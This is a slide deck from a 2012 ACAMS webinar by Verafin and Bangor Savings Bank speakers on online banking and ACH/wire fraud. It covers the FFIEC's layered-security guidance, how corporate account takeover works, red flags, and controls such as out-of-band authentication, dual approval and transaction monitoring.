Upload
others
View
2
Download
0
Embed Size (px)
Citation preview
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
COPYRIGHT NOTICE – USE OF WEBEX LOGIN/PASSWORD FOR ACAMS WEB SEMINARS
Each site license entitles registrant to one login: one phone connection (if accessing audio via teleconference) and one Internet connection for simultaneous Webcast, in
one room where an unlimited number of listeners may participate.
Providing your login instructions and password to another for their use, using your login ID/password more than once, or any simultaneous or delayed transmission,
broadcast, re-transmission or re-broadcast of this event to additional sites/rooms by any means (including but not limited to the use of telephone conferencing services or a conference bridge, whether external or owned by the registrant) or recording is a
violation of U.S. copyright law and is strictly prohibited.
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Technical Assistance • Send a message via the Q & A box• Or Call WebEx Technical Support:
(US & Canada) 866-229-3239 (International) 916-229-3239
Attendee instructions on how to use Audio Broadcast • Do not close the Audio Broadcast panel• If you are not able to listen to the audio on your computer speakers, press the stop button, wait 5 seconds then press play. • Make sure to adjust the volume button on your computer speakers and also adjust the volume on your sound card. To do
this, go to the Start Menu, click Control Panel, then click Sound & Audio Devices and adjust accordingly.• If you do not have speakers, please refer to your login instructions for the Teleconference Domestic and International
Numbers and Access Code.• You may request the Teleconference Number by clicking “Request” under the attendee box on your left hand side.
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Welcome to Today’s ACAMS Web Seminar
ACH/Wire and Online Banking Fraud:The Impetus Behind FFIEC’s Guidance for Layered
Security
April 11, 201212:00 Noon– 1:00 PM EDT
A sound check will be performed 5 minutes before the start time.
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
• Can you hear the sound check? • It has begun
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
To send a question:
• Locate the Q & A box on the bottom right hand corner of the WebEx platform.
• Type in your question and click send!
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
ACH/Wire and Online Banking Fraud:The Impetus Behind FFIEC’s Guidance for Layered
Security
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Today’s Presenters
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Co‐founded Verafin (BSA/AML Compliance & Fraud Detection software company) in 2003
Frequent speaker at industry conferences and key presenter for Verafin’s anti‐financial crime thought leadership webinar series
Verafin has more then 800 financial institution customers across North America
BRENDAN BROTHERSCo‐FounderVerafin
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Rick has over 29 years of experience in Banking, specializing in Risk Management, Information Security, Operations, Compliance and Internal Audit.
Has been with Bangor Savings Bank for 13 years
Oversees enterprise risk management, information & physical security, fraud management, compliance, BSA, credit policy, loan review, real estate valuation and legal
RICK MALTZExecutive Vice President & Chief Risk OfficerBangor Savings Bank
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud:The Impetus Behind FFIEC’s
Guidance for Layered Security
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Today’s Agenda:
FFIEC Guidance on Internet Banking
Layered Security
Corporate Account Take Over
Processes, Controls & Best Practices to Combat Online Account Takeover
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Overview of Changes in 2011 Supplement
Guidance
2011
Authentication in an Internet Banking Environment
2005
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Small and midsize businesses are frequent targets
Despite expectation for periodic risk assessments, examiners reported that some FIs have not done so
Agencies needed to reemphasize and clarify control expectations
Supplement has more specificity:
New expected minimum control levels
Certain controls no longer considered effective as primary
Since 2005, threats have become more sophisticated, effective, and malicious
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Key Highlights of the Guidance Supplement
GuidanceAuthentication in an Internet Banking Environment
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Layered Security
Different controls at different points so weakness in one compensated for by strengths in another
Agencies expect “layered security”
for all accounts
classified as “high‐risk”
under FFIEC guidance
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
a classic child’s toy illustrates very simply
the concept of layered security…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
…they encounter a further layer
when a financial criminal moves beyond one layer of security…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
layered security in the banking world…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
layered security in the banking world…
“The institution with complementary layered technologies is akin to the house
with a high fence, a big guard dog in the yard, and a burglar alarm inside.
Source: Aite
Group, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
layered security in the banking world…
“The institution with complementary layered technologies is akin to the house
with a high fence, a big guard dog in the yard, and a burglar alarm inside.
This provides multiple opportunities to catch the bad guys in the act,
and
encourages the criminals to go in search of easier prey.”
Source: Aite
Group, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Examples of Security Layers
the deeper the defense – the stronger the protection
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
tokens
the deeper the defense – the stronger the protection
customer education & awarenesscustomer
agreements secure browser plug-
inimage &
challenge questions
strong passwords
backend analytics
TMS fraud services
out of band authorization
associate education & awareness
commercial dual
controls
Security Layers
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
overt controls and invisible controls…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
“When constructing a layered security program, strike a balance
between
overt controls
(such as stronger authentication practices) and invisible
controls
(such as fraud detection and monitoring).
overt controls and invisible controls…
Source: Bank Systems and Technology, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
“When constructing a layered security program, strike a balance
between
overt controls
(such as stronger authentication practices) and invisible
controls
(such as fraud detection and monitoring).
Flashing lights and alarms may work well to scare thieves away, but invisible
alarms that call the police are more effective at catching a thief.”
overt controls and invisible controls…
Source: Bank Systems and Technology, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
A Framework for Fraud Protection
A layered security system affords the best
protection, since no single layer is
sufficient
to stop determined bad actors
from penetrating enterprise systems.
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
1Endpoint‐Centric
Secure browsing, OOB authentication and transaction verification
Endpoint device identification, mobile location services
Layer 1
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
1
2
Navigation‐Centric
Analyzes session behavior and compares it to what is expected
Layer 2
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
1
2 3
User and Account‐Centric
for Specific Channel
Monitors and analyzes user and account behavior, and identifies anomalous behavior
Layer 3
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
1
2 34
User and Account‐Centric Across
Multiple Channels and Products
Monitors and analyzes user and account behavior across channels, and correlates alerts for each entity across channels and products
Layer 4
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
1
2 34
5
Pattern‐Based Intelligence
Enables the analysis of relationships among internal and/or external entities and their attributes (e.g., users, accounts, machines)
Layer 5
Source: Gartner, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
transaction‐level security…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
“Creators of malware are innovative and nimble, and have proven to
be effective at compromising security strategies that do not
incorporate transaction‐level security.
transaction‐level security…
Source: Aite
Group, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
“Creators of malware are innovative and nimble, and have proven to
be effective at compromising security strategies that do not
incorporate transaction‐level security.
Effective, efficient detection of anomalies, especially those related
to transaction activity, requires sophisticated behavior
analytics.
transaction‐level security…
Source: Aite
Group, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
“Creators of malware are innovative and nimble, and have proven to
be effective at compromising security strategies that do not
incorporate transaction‐level security.
Effective, efficient detection of anomalies, especially those related
to transaction activity, requires sophisticated behavior
analytics.
The key to effective protection against sophisticated attacks is
transaction‐level security that can profile behavior
at the user level,
and can send alerts for out‐of‐pattern behavior.”
transaction‐level security…
Source: Aite
Group, 2011
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Corporate Account TakeoverThe Risk
Is A Reality
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Source: Financial Times, 2012
Cyberthieves have cost US companies and their banks more than $15bn in the past five years, the Federal Deposit Insurance Corporation found in a recent study.
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
What is Corporate Account Takeover?
A fast growing electronic crimewhere thieves typically use some form of malware to obtain login credentials to Corporate Online Banking accounts and fraudulently transfer funds from the account(s)
Payments used to commit the crime:
•
Domestic and International Wire Transfers
•
Business‐to‐Business ACH Payments
•
Online Bill Pay
•
Electronic Payroll
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Five Major Aspects of the Crime
Recruitment – Utilize Command & Control network to recruit Money Mules and target victim companies
Target – Small to midsized business and organizations
Infiltration – Attackers utilize numerous tactics to gain access to your network or computer, Banking Trojans
Exfiltration – Transferring electronic funds out of your account(s) through coordinated effort
Money Mules – Victims or Suspects/Money laundered
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
How the Takeover HappensCriminals target victims by scams
Victim unknowingly installs software by clicking on a link or visiting an infected Internet site
Fraudsters begin monitoring the accounts
Victim logs on to their Online Banking
Fraudsters collect login credentials
Fraudsters wait for the right time and then depending on your controls:
•
they either login after hours
•
or if you are using a token ‐
they wait until you enter
your code and then hijack the session and send you a
message that Online Banking is temporarily unavailable
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Sample Corporate Account Takeovers and LossesPennsylvania School District ‐ $450,000New York School District ‐ $500,000Experi‐Metal ‐ $550,000PATCO ‐ $358,000Hillary Machinery ‐ $229,000Illinois Town ‐ $70,000Marian College ‐ $189,000Sand Springs School ‐ $80,000Sycamore County Schools ‐ $300,000Village View Escrow ‐ $465,000Catholic Diocese of Des Moines ‐ $600,000Town of Pittsford, NY ‐ $139,000Steuben Arcs ‐ $158,000St. Isidore’s Catholic Church ‐ $87,000Two Trucking Companies ‐ $115,000MECA ‐ $217,000
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Source: ACH Alert
The FBI estimates Corporate Account Takeover could cost American companies as much as $1,000,000,000
in 2011 alone.
FBI currently investigating over 400 cases of corporate account takeovers in which criminals initiated unauthorized ACH and wire transfers from bank accounts of U.S. businesses.
In one 2011wire fraud case – Zeus Trojan and keylogging compromised businesses’ login credentials and wired $11million to China
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Risk Management of
Corporate Account Takeover
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Blueprint for a Risk Management FrameworkCorporate Account Takeover (CATO)
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
CATO
Three-Part Framework
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
CATO
Protect Implement processes and controls to protect the
financial institution and corporate customers.
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Detect
Protect
Establish monitoring systems to detect
electronic theft and educate employees and
customers on how to detect a theft in progress.
CATO
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Respond
Detect
Protect
Prepare to respond to an incident as
quickly as possible (measured in minutes,
not hours) to increase the chance of
recovering the money for your customer.
CATO
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
19 Recommended
Processesand
Controls
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
(outlined for each of the nineteen recommended processes and controls)
Best Practices
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
ExampleBest Practice
Educate bank employees of warning signs that a theft may be in progress.
Red Flags of a possible takeover
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Configuration Changes to Cash Management/Online Banking Profiles
New user accounts added
New ACH batches or wire templates with new payees
Changes to personal information
Disabling or changing notifications
Changes to the online account access profile
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Unusual Customer ActivityUnfamiliar IP log‐on address (especially if a foreign IP address)
Unusually small transaction amounts (example: $1.00 ACH, bill pay, or other transactions – especially if made at unusual time of day)
Unusual (non‐typical) transfer of funds, especially if out of the bank. One‐time bill pay to new payees
ACH or wires to new payees or receivers and/or with unusual amounts
Changes to the account and routing numbers of existing payees, not just a new payee name
Unusual timing of transactions (based on the established transaction schedule of the corporate customer or random transactions submitted between traditional transactions)
Larger than usual transactions
Overseas transfers
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Full List of Best Practices
www.ectf.dob.texas.govSee “Recommendations”
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Source: Ponemon
Institute, 2011
Survey results of 533
senior‐level executives in small
and medium businesses across the United States
Some Closing Thoughts to Ponder…
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Startling Statistics
70% believe their banking institution is ultimately most responsible for ensuring their online accounts are secure
61% believe that only one successful fraud involving online bank accounts could destroy their trust
85% say they would transfer their business to another bank
Source: Ponemon
Institute, 2011
www2.acams.org/webinars
Online Banking Fraud
FFIEC’s Guidance on Authentication in an Internet Banking Environment
Rick MaltzExecutive Vice President & Chief Risk Officer
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
FFIEC –
Supplement to Authentication in an Internet Banking Environment (2011)
Clearly Places More Responsibility on Banks:
Requires annual risk assessments
Authentication consistent with the level of risk
Layered security must be considered
Must have practices to Detect & Respond to Suspicious Activity
Customer education & awareness
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Why is this Important?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Is this your Risk Management Program?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Does your Bank want to lose money?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Do you think your customers care who’s fault it is?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Consumer Liability
Under existing regulations, the Consumer liability is extremely limited:
Generally $50, but may be $500 or unlimited if Bank is not notified timely
Visa/MasterCard, generally $0, if Bank is notified after 2 business days of discovery
Basically, the Bank eats it all!
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Business Liability -
Under Uniform Commercial Code
For Internet transactions, the business is liable for unauthorized transfers, if:
The Bank can prove that the transaction was processed good faith, and
The Bank provided & complied with a commercially reasonable security procedures
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Challenges to UCC standards
Banks are being sued for losses due to:
Failed or weak security practices
Ineffective monitoring
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Should the car dealer be liable for this? If you…….
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Get hurt because you decided not to wear your seatbelt?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Both the Bank & Business Can and Will Lose Money!
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Threat Environment
Organized Global Crime
Criminals making investments in people & technology just like normal businesses
Sanctioned in some countries for economic benefit
Can be related to terrorist financing
Money Laundering key to successful fraud activities
Threat complexity is overwhelming traditional defenses
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Criminals know that most small businesses don’t:
Always use Bank security features,Monitor & reconcile accounts, orHave resources to protect data & systems
Threat Environment
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Threat Landscape
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Fraud, Data Loss and Identity Theft continues to frustrate Banks & Customers
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Traditional Threats:
Credential Theft by:
Phishing
Vishing
Smishing
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Significant Threat: Malware
Malicious Software, designed to infiltrate a computer system without the owner’s informed consent
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Malware Trends (Source: Symantec Intelligence Report )
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Simple Email Statistics
(source: Symantec Intelligence Report –
February 2012 )
Estimated Total # of Global e-mail messages:
1.3 trillion messages in Feb 2012
or
43.1 billion email messages per day
which translates to:
Almost 500 million per second
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Spam Email
(source: Symantec Intelligence Report –
February 2012)
If 68% of all e-mail was considered spam in February, then:
29.4 billion spam emails per day
or
339.7 million per second
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Malicious Email
(source: Symantec Intelligence Report –
February 2012)
One in every 358 emails was a phishing scam
That’s over 120 million phishing emails per month or 4.2 million per day
One in every 274 emails contained Malware
That’s over
157 million emails with malware per month or 5.4 million per day
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Threat: “Drive by E-mails”
Instant infection threat:
Infects users who simply view a message, or possibly just glance at it in a preview window
New generation of e-mail-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Traditional defenses
are no longer effective by themselves:
Multi-Factor or Strong Authentication
Challenge Response Questions
Virus Protection, Firewalls
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Why is compliance with the guidance important?
Because it makes sense!
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
What Can Banks Do?
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Not Going to Work!
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Leverage Current Investments
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
BSA/AML Analysts
•
Already reviewing data for suspicious activity
•
Trained to spot certain behavior
•
Investigations
•
Filing SARs
Fraud & Information Security Analysts
•
Already reviewing data for suspicious activity
•
Trained to spot certain behavior
•
Investigations
•
Filing SARs
Learn to Share Intelligence Internally
Leverage Personnel
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Consolidate technology where practical
•
Wire & ACH Monitoring
•
Monitoring of log-on anomalies
•
AML
•
Debit Card fraud
•
Check Fraud
•
Case Management & SAR filing
Leverage Technology Investments
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Practice Defense
in Depth
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Out-of-Band Authentication
Enhanced Multi-Factor Authentication
1. User logs in with their Username and Password
Something you know
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Out-of-Band Authentication
Because of multi-factor authentication, fraudster can not independently loginto a user account.
• Fraudster would need to know username/password AND have the users phone. *
Login Code:
351073.
2. User is prompted to select channel for delivery of One Time Password (OTP)
Something you have *
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Transaction Verification
Transaction OTP requires a second individual to verify the EFT.
• In separate out of band channel, User sees transaction detail and amount• Unless verified with OTP, the EFT will not go through
Require secondary approval of transactions or key changes with OTP
Payment
To: Bob, Account #12345
Amount: $100.00
Access Code: 46548
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Callbacks
Bank will call to verify whether a transaction is authentic:
The call should go to someone other than the person who initiated the transaction
Call should be confirmed by a “PIN”
Callbacks
are effective as they provide true “out of band”
authentication.
They protect against both internal & external fraud
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Browser-based control
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Separation of Duties
By separating the capabilities in this way, you prevent a scenario
where one account can transfer funds independently.
Separation of Duties
Configure one account with permission initiate a funds transfer
Configure a secondary account to approve the transfer
User A initiates EFT User B approves EFT
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Separation of PCs
By isolating the PCs in this way, you reduce the risk that malware can infect
both machines and steal information
Use separate PCs
One PC to initiate a funds transfer
One PC to approve a funds transfer
Don’t allow other Internet ActivityUser A initiates EFT User B approves EFT
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Strong Passwords
A well-chosen password is easy to remember, but hard to guess.
Length: Minimum 8 characters
Complexity: Combination of mixed case letters, numbers, and special characters.
Periodically change password
Do not share passwords
A few of the common things to avoid in your password:
• User ID, family member or name, pet name, address, birth dates, SSN, account #, phone #
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Control: Malware protection, Patching, and Firewalls
Firewalls limit the potential for unauthorized access to a network and computers
Anti Virus, Anti-Spyware •Install and ensure virus protection and security software are updated regularly
Patching •Ensure security patches are applied to both OS and applications (Microsoft, Adobe, Java, etc)
Firewall (Corporate & desktop)•Install a dedicated, actively managed firewall
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Transaction Alerting• User makes a change
−
User is instantly alerted of change
Payee Added:
Bob, Account #12345
It is impossible to prevent attacks on insecure client PCs. TA exposes resultsof transactions to the user who then can take appropriate action
User is notified when important changes are made• If alerted of a change they did not make, users will naturally contact the FI
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Look for event anomalies associated with:
Logon activityChanges in user profiles, customer setupIP addresses not associated with your corporationTransactions not consistent with customer’s behavior
Control: Monitor for Unusual Activity
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Evaluate customer contracts:
Clearly define security proceduresDefine customer’s responsibilityProvide educational materialDo not allow “Opt Out”
Control: Customer Contracts
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Educate your customers:
Prevention is a Partnership
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Risk Problem – Van has rolled over the edge
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Risk Solution – Lift it with a crane
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Risk Monitoring: Going well so far……..
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Ooooops……..New Risk Problem
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Traditional Thinking – Get A Bigger Crane
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Result of Traditional Thinking….Who cares!
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
If you continue to think inside of the box, you will lose $
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
Q&A• Locate the Q & A box on the bottom right hand corner of the WebEx platform.
• Type in your question and click send!
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
If you have suggestions for future web seminars or
additional questions for today’s experts, please send them to:[email protected]
Thank you for joining us today!
www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security111
Next Web Seminar:AML Audit (Part I): Demystifying the AML Audit Discovery Phase—Preparing for the Pre-Visit
April 18, 2012 – Noon to 2:00 PM EDT